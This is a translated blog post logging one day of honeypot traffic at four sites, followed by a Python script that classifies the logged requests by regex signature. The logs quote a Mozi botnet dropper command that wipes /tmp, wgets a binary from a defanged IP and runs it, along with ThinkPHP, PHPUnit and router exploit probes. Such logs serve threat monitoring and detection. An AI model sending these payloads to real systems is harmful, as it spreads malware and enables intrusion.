コンニチハレバレトシタアオゾラ

With nothing better to do, I spend the whole day facing my blog, jotting down at random whatever trifles drift through my mind,

2021/04/13 Honeypot (tentative) observation log

This is the honeypot (tentative) observation log for 2021/04/13.

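Highlights
Common to all locations

Access targeting GPON router vulnerabilities
Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access targeting the PHPUnit vulnerability (CVE-2017-9841)
Access targeting Spring Boot vulnerabilities
Access targeting ThinkPHP vulnerabilities
Scanning by zgrab
Scanning for /.env
Scanning for Apache Solr
Scanning for Laravel
Scanning for WordPress
Scanning for WordPress plugins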

Location:JP

The following were observed:

Scanning for Apache Tomcat
Access with the UserAgent "Hello, World"

Location:US

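The following were observed:

Access targeting vulnerabilities in DrayTek products
Scanning by XTC
Scanning for Apache Tomcat
Illicit traffic involving 110[.]242[.]68[.]4
Access with the UserAgent "Hello, World"
Access with the UserAgent "Hello, world"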

The following access to /shell was observed:

cd /tmp;
rm -rf *;
wget http[:]//123[.]4[.]253[.]149:45258/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location:UK

The following were observed:

Scanning by curl
Scanning for Apache Tomcat
Scanning for phpMyAdmin
Scanning of /[0-9a-z]
Illicit traffic involving 110[.]242[.]68[.]4
Access with the UserAgent "Hello, World"
Access with the UserAgent "Hello, world"
Gh0stRAT-like behavior

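The following access to /shell was observed:

cd /tmp;
rm -rf *;
wget http[:]//58[.]255[.]211[.]94:48643/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location:SG

Access count trend

JP: total accesses: 69 (change from previous day: -55)
US: total accesses: 60 (change from previous day: +22)
UK: total accesses: 290 (change from previous day: +119)
SG: total accesses: 38 (change from previous day: -131)

For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 requests are excluded.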

Location:JP

Source IP address list

Count Source IP address

UserAgent list

Count UserAgent
10 -
4 Hello, World
1 Mozilla/4.0
5 Mozilla/5.0 (Android 7.0; Mobile; rv:65.0) Gecko/65.0 Firefox/65.0
7 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
18 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.15 (KHTML, like Gecko) Chrome/24.0.1295.0 Safari/537.15
6 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3 Mozilla/5.0 zgrab/0.x
1 python-requests/2.18.4

Request list

Count Method Request Protocol
3 \x16\x03\x01
1 \x16\x03\x01\x01\xfa\x01
6 GET /.env HTTP/1.1
1 GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP HTTP/1.1
1 GET /HNAP1 HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
1 GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /evox/about HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /jenkins/login HTTP/1.1
1 GET /login HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /media/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /news/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /nmaplowercheck1618206376 HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /site/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /test/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /web/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /website/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /xmlrpc.php?rsd HTTP/1.1
1 HEAD / HTTP/1.1
1 HEAD /4Dwn HTTP/1.1
1 OPTIONS / HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
4 POST /GponForm/diag_Form?images/ HTTP/1.1
3 POST /HNAP1/ HTTP/1.0
1 POST /_ignition/execute-solution HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /goform/SystemCommand HTTP/1.1
1 POST /index.htm HTTP/1.1
1 POST /sdk HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

Location:US

Source IP address list

Count Source IP address

UserAgent list

Count UserAgent
12 -
1 Hello, World
1 Hello, world
1 Mozilla/4.0
7 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.91 Safari/537.36
6 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
5 Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 Safari/605.1.15
2 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.01724933 Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E302
4 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
1 XTC
1 python-requests/2.18.4

Request list

Count Method Request Protocol
3 \x03
1 \x16\x03\x01
1 CONNECT cn[.]bing[.]com/:443 HTTP/1.1
1 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
1 CONNECT www[.]bing[.]com/:443 HTTP/1.1
1 CONNECT www[.]so[.]com/:443 HTTP/1.1
1 CONNECT www[.]voanews[.]com/:443 HTTP/1.1
1 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP HTTP/1.1
1 GET /HNAP1 HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /evox/about HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /jenkins/login HTTP/1.1
1 GET /login HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /manager/html/ HTTP/1.0
1 GET /nmaplowercheck1618237681 HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//123[.]4[.]253[.]149:45258/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET http[:]//dongtaiwang[.]com/ HTTP/1.1
1 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 GET http[:]//www[.]kuandai[.]net[.]cn/pause.html HTTP/1.0
1 GET http[:]//www[.]minghui[.]org/ HTTP/1.1
1 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
1 GET http[:]//www[.]soso[.]com/ HTTP/1.1
1 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
1 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
1 OPTIONS / HTTP/1.0
1 POST /.env HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /_ignition/execute-solution HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /cgi-bin/mainfunction.cgi HTTP/1.1
1 POST /goform/SystemCommand HTTP/1.1
1 POST /sdk HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//cisza[.]website/cc146e464ed79e5db6783d94d1476deab50d873edc2e764a0b8af3c0d67957240092ae0731616eeb3243248a0fed7ce462ece95fd77c8029a0b784aa60c0d9b45dd5a06a1c7ac6585b0fa228141a17ab7c87087034111c15b646338af825785b HTTP/1.1

Location:UK

Source IP address list

Count Source IP address

UserAgent list

Count UserAgent
14 -
2 Hello, World
1 Hello, world
1 Mozilla/4.0
33 Mozilla/5.0
7 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
5 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
73 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
122 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
5 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1
3 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.01678543 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11
4 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
1 curl/7.64.0

Request list

Count Method Request Protocol
1 -
1 Gh0st\xad
2 \x16\x03\x01
1 CONNECT cn[.]bing[.]com/:443 HTTP/1.1
1 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
1 CONNECT www[.]so[.]com/:443 HTTP/1.1
1 CONNECT www[.]voanews[.]com/:443 HTTP/1.1
2 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
2 GET /.well-known/security.txt HTTP/1.1
1 GET /0 HTTP/1.1
1 GET /1 HTTP/1.1
1 GET /2 HTTP/1.1
1 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /3 HTTP/1.1
1 GET /4 HTTP/1.1
1 GET /5 HTTP/1.1
1 GET /6 HTTP/1.1
1 GET /7 HTTP/1.1
1 GET /8 HTTP/1.1
1 GET /9 HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP HTTP/1.1
1 GET /PMA/index.php?lang=en HTTP/1.1
1 GET /PMA2011/index.php?lang=en HTTP/1.1
2 GET /PMA2012/index.php?lang=en HTTP/1.1
2 GET /PMA2013/index.php?lang=en HTTP/1.1
1 GET /PMA2015/index.php?lang=en HTTP/1.1
1 GET /PMA2016/index.php?lang=en HTTP/1.1
1 GET /PMA2019/index.php?lang=en HTTP/1.1
1 GET /PMA2020/index.php?lang=en HTTP/1.1
1 GET /PMA2021/index.php?lang=en HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /_phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /_phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /a HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin/db/index.php?lang=en HTTP/1.1
1 GET /admin/pMA/index.php?lang=en HTTP/1.1
2 GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1
3 GET /admin/sqladmin/index.php?lang=en HTTP/1.1
2 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
3 GET /admin/web/index.php?lang=en HTTP/1.1
1 GET /administrator/admin/index.php?lang=en HTTP/1.1
1 GET /administrator/db/index.php?lang=en HTTP/1.1
1 GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1
4 GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /administrator/pma/index.php?lang=en HTTP/1.1
1 GET /administrator/web/index.php?lang=en HTTP/1.1
1 GET /b HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
1 GET /c HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /d HTTP/1.1
1 GET /database/index.php?lang=en HTTP/1.1
1 GET /db/index.php?lang=en HTTP/1.1
2 GET /db/myadmin/index.php?lang=en HTTP/1.1
2 GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1
2 GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /db/webadmin/index.php?lang=en HTTP/1.1
1 GET /db/webdb/index.php?lang=en HTTP/1.1
2 GET /db/websql/index.php?lang=en HTTP/1.1
1 GET /dbadmin/index.php?lang=en HTTP/1.1
1 GET /e HTTP/1.1
1 GET /f HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /g HTTP/1.1
1 GET /h HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /i HTTP/1.1
2 GET /index.php HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /j HTTP/1.1
1 GET /jenkins/login HTTP/1.1
1 GET /k HTTP/1.1
1 GET /login HTTP/1.1
1 GET /m HTTP/1.1
1 GET /manager/html HTTP/1.1
2 GET /myadmin/index.php?lang=en HTTP/1.1
1 GET /mysql-admin/index.php?lang=en HTTP/1.1
1 GET /mysql/admin/index.php?lang=en HTTP/1.1
1 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
1 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/pma/index.php?lang=en HTTP/1.1
1 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/web/index.php?lang=en HTTP/1.1
1 GET /mysqladmin/index.php?lang=en HTTP/1.1
1 GET /mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /n HTTP/1.1
1 GET /o HTTP/1.1
1 GET /php-my-admin/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin2/index.php?lang=en HTTP/1.1
1 GET /phpmy-admin/index.php?lang=en HTTP/1.1
2 GET /phpmy/index.php?lang=en HTTP/1.1
1 GET /phpmyAdmin/index.php?lang=en HTTP/1.1
73 GET /phpmyadmin/ HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
1 GET /phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2011/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2012/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2013/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2014/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2015/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2016/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2019/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2020/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin4/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin5/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin_/index.php?lang=en HTTP/1.1
1 GET /phppma/index.php?lang=en HTTP/1.1
1 GET /pma/index.php?lang=en HTTP/1.1
1 GET /pma2012/index.php?lang=en HTTP/1.1
1 GET /pma2015/index.php?lang=en HTTP/1.1
1 GET /pma2016/index.php?lang=en HTTP/1.1
1 GET /pma2017/index.php?lang=en HTTP/1.1
1 GET /pma2018/index.php?lang=en HTTP/1.1
1 GET /pma2019/index.php?lang=en HTTP/1.1
1 GET /pma2020/index.php?lang=en HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /program/index.php?lang=en HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /q HTTP/1.1
1 GET /r HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /s HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//58[.]255[.]211[.]94:48643/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shopdb/index.php?lang=en HTTP/1.1
2 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
3 GET /sql/myadmin/index.php?lang=en HTTP/1.1
1 GET /sql/php-myadmin/index.php?lang=en HTTP/1.1
2 GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1
1 GET /sql/phpmanager/index.php?lang=en HTTP/1.1
1 GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /sql/phpmyadmin2/index.php?lang=en HTTP/1.1
3 GET /sql/sql/index.php?lang=en HTTP/1.1
1 GET /sql/sqladmin/index.php?lang=en HTTP/1.1
1 GET /sql/sqlweb/index.php?lang=en HTTP/1.1
1 GET /sql/webdb/index.php?lang=en HTTP/1.1
1 GET /sql/websql/index.php?lang=en HTTP/1.1
2 GET /sqlmanager/index.php?lang=en HTTP/1.1
1 GET /t HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /u HTTP/1.1
1 GET /v HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /w HTTP/1.1
2 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET /x HTTP/1.1
1 GET /z HTTP/1.1
1 GET http[:]//dongtaiwang[.]com/ HTTP/1.1
1 GET http[:]//www[.]epochtimes[.]com/ HTTP/1.1
1 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
1 GET http[:]//www[.]soso[.]com/ HTTP/1.1
1 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
1 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
1 OPTIONS / HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /_ignition/execute-solution HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /goform/SystemCommand HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

Location:SG

Source IP address list

Count Source IP address

UserAgent list

Count UserAgent
6 -
1 Mozilla/4.0
4 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.15 (KHTML, like Gecko) Chrome/24.0.1295.0 Safari/537.15
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3 Mozilla/5.0 zgrab/0.x
1 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
1 python-requests/2.18.4

Request list

Count Method Request Protocol
1 \x16\x03\x01\x01\xfb\x01
2 CONNECT www[.]bing[.]com/:443 HTTP/1.1
5 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
2 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /jenkins/login HTTP/1.1
1 GET /login HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
2 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 HEAD /4Dwn HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /_ignition/execute-solution HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /goform/SystemCommand HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//lisalancaster[.]site/e3b5164b4dabaa422ba781264045323644951847abe553debe249d97c4e6f3769bdb056f3b659053ed1198f519e2186a5d009e67d8d8804fd545923db7c6389194623a202e9572365686e2eb1575b008c3043b212867100aab9422aa8cde598a HTTP/1.1
1 POST http[:]//seduced[.]xyz/29272c47115b5a93be87e3a9d8739fb2e8a1fea6aa31852af190389734c519465bc5c519683d30705f7ae9fe1adf4113b3085c3848c6d4dce7b4b3650e97caa7988b07362de13914896d9008a8c9551862793927a64d8a436fda41db227def1b HTTP/1.1
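
The categories in the summary can be derived from the request lists mechanically. The following Python is an added example, not the blog author's tooling: it labels honeypot request lines with those categories and splits a /shell request into the commands it carries, as the summary does by hand. The names classify, shell_commands and SIGNATURES and the regex-to-label mapping are assumptions of this example; the sample lines are copied from the request lists on this page.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) (HTTP/\d\.\d)$")

# Labels follow the categories in the summary. The regex-to-label mapping is an
# assumption of this example, not the blog author's rules. First match wins.
SIGNATURES = [
    ("command injection via /shell", r"^/shell\?"),
    ("GPON router", r"^/GponForm/diag_Form"),
    ("Liferay JSON Web Service (CVE-2020-7961)", r"^/api/jsonws/invoke"),
    ("PHPUnit (CVE-2017-9841)", r"/phpunit/.*/eval-stdin\.php$"),
    ("Spring Boot", r"^/actuator/"),
    ("ThinkPHP", r"invokefunction"),
    ("DrayTek", r"^/cgi-bin/mainfunction\.cgi"),
    ("/.env", r"^/\.env$"),
    ("Apache Solr", r"^/solr/"),
    ("Laravel", r"^/_ignition/"),
    ("WordPress plugin", r"/wp-content/plugins/"),
    ("WordPress", r"/wp-login\.php|/wp-includes/|/xmlrpc\.php"),
    ("Apache Tomcat", r"^/manager/html"),
    ("phpMyAdmin", r"phpmyadmin|/pma\d*/"),
]
SIGNATURES = [(label, re.compile(rx, re.I)) for label, rx in SIGNATURES]

def classify(request_line):
    """Return the category label for one logged request line."""
    m = REQUEST_LINE.match(request_line)
    if not m:
        return "non-HTTP payload"      # raw bytes such as \x16\x03\x01 or Gh0st
    method, target, _ = m.groups()
    if method == "CONNECT" or target.startswith("http"):
        return "proxy-style request"   # origin-form paths always start with "/"
    for label, pattern in SIGNATURES:
        if pattern.search(target):
            return label
    return "other"

def shell_commands(target):
    """Split the query of a /shell request into the commands it carries."""
    _, _, query = target.partition("?")
    return [c.strip() for c in unquote_plus(query).split(";") if c.strip()]

def summarize(request_lines):
    return Counter(classify(line) for line in request_lines)

# Sample input: request lines from this page's lists, counts dropped.
SAMPLE = [
    r"\x16\x03\x01",
    "GET /.env HTTP/1.1",
    "POST /GponForm/diag_Form?images/ HTTP/1.1",
    "POST /api/jsonws/invoke HTTP/1.1",
    "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1",
    r"GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1",
    "POST /cgi-bin/mainfunction.cgi HTTP/1.1",
    "GET /PMA2019/index.php?lang=en HTTP/1.1",
    "CONNECT www[.]baidu[.]com/:443 HTTP/1.1",
    "GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//123[.]4[.]253[.]149:45258/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1",
    "GET /favicon.ico HTTP/1.1",
]

if __name__ == "__main__":
    for label, n in summarize(SAMPLE).most_common():
        print(f"{n:3d}  {label}")
    for cmd in shell_commands(REQUEST_LINE.match(SAMPLE[9]).group(2)):
        print("     ", cmd)
```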